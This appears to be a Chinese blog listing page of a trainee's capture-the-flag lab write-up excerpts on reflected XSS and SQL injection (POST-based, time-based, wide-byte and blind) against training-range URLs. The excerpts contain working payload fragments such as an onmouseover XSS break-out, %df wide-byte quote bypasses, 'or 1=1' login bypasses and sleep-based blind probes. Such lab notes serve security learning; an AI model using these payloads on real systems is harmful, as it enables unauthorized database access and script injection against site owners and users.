Track 实习学员

silence丶

0关注
0粉丝
16文章
返回网站首页

您已发布 16篇文章作品写文章

9.1、反射型XSS靶场

目标:http://59.63.200.79:8002/xss/index.php1.输入框输入123"  并右键查看元素,发现双引号未生效2.使用单引号闭合,发现异常3.使用payload   123'onmouseover=alert(1)//,语句成功闭合,标签成功执行,如下4.鼠标移动到输入框可弹出flag。

 2019-7-10
 0 
 293 

SQL注入-Post注入Rank 1-Rank 3

目标:http://59.63.200.79:8812/New/PostBased/RankOne/sql-one/Rank 11.抓包获取提交参数,使用hackbar调试。2.用户名处输入任意内容并添加单引号,单引号报错3.多种注释方法:#、%23、--等,尝试,#和%23生效  测试1'or 1=1#  1'or 1=2# 确认注入4.zkz'ord

 2019-7-9
 0 
 486 

6.4.3-SQL注入-延时注入Rank 3

目标:http://59.63.200.79:8812/New/TimeBased/RankThree/sql-three/?id=1和前两题类似,这道题是用双引号结束SQL1.http://59.63.200.79:8812/New/TimeBased/RankThree/sql-three/?id=1"and if(ascii(substr(database(),1,1))>1

 2019-7-5
 0 
 217 

6.4.2-SQL注入-延时注入Rank 2

目标: http://59.63.200.79:8812/New/TimeBased/RankTwo/sql-two/?id=1和延时第一题差不多,只不过回显不会改变了1.http://59.63.200.79:8812/New/TimeBased/RankTwo/sql-two/?id=1'and if(ascii(substr(database(),1,1))>1,sl

 2019-7-5
 0 
 147 

SQL注入-延时注入Rank 1

目标:http://59.63.200.79:8812/New/TimeBased/RankOne/sql-one/1.http://59.63.200.79:8812/New/TimeBased/RankOne/sql-one/?id=1'   加单引号报错2.http://59.63.200.79:8812/New/TimeBased/RankOne/sql-one

 2019-7-4
 0 
 415 

SQL注入-宽字节注入Rank 3

目标:http://120.203.13.75:8150/New/WidecharBased/RankThree/sql-three/1.输入11',单引号被转义,使用%df进行绕过,发现--+注释无效,换成%232.post数据改成 uname=zkz%df'or 1=1%23&passwd=&submit=Submit,登陆成功3.order by 为

 2019-3-8
 0 
 177 

SQL注入-宽字节注入Rank 2

目标:http://120.203.13.75:8150/New/WidecharBased/RankTwo/sql-two/?id=11.输入单引号,发现被转义,使用%df绕过2.?id=1%df'and 1=1--+   ?id=1%df'and 1=2--+3.order by 为34.?id=-1%df'union select 1,databa

 2019-3-8
 0 
 60 

SQL注入-宽字节注入Rank 1

目标:http://120.203.13.75:8150/New/WidecharBased/RankOne/sql-one/?id=11.输入单引号,发现被转义,使用%df绕过2.?id=1%df'and 1=1--+   ?id=1%df'and 1=2--+3.order by 为34.?id=-1%df'union select 1,databa

 2019-3-8
 0 
 78 

SQL注入-盲注Rank 2

目标:http://120.203.13.75:8150/New/BlindBased/RankTwo/sql-two/?id=11.输入单引号,正常2.输入双引号,页面报错;?id=1" and 1=1--+   ?id=1" and 1=2--+3.?id=1"order by 3 --+ 3个字段4.?id=1"and length

 2019-3-8
 0 
 34 

SQL注入-盲注Rank 1

目标:http://120.203.13.75:8150/New/BlindBased/RankOne/sql-one/?id=11.单引号报错,继续and 1=1、and 1=2 判断注入2.?id=1'order by 3 --+ 3个字段3.?id=1'and length(database())>=8--+  数据库名字符长度为84.?id=1'an

 2019-3-8
 0 
 49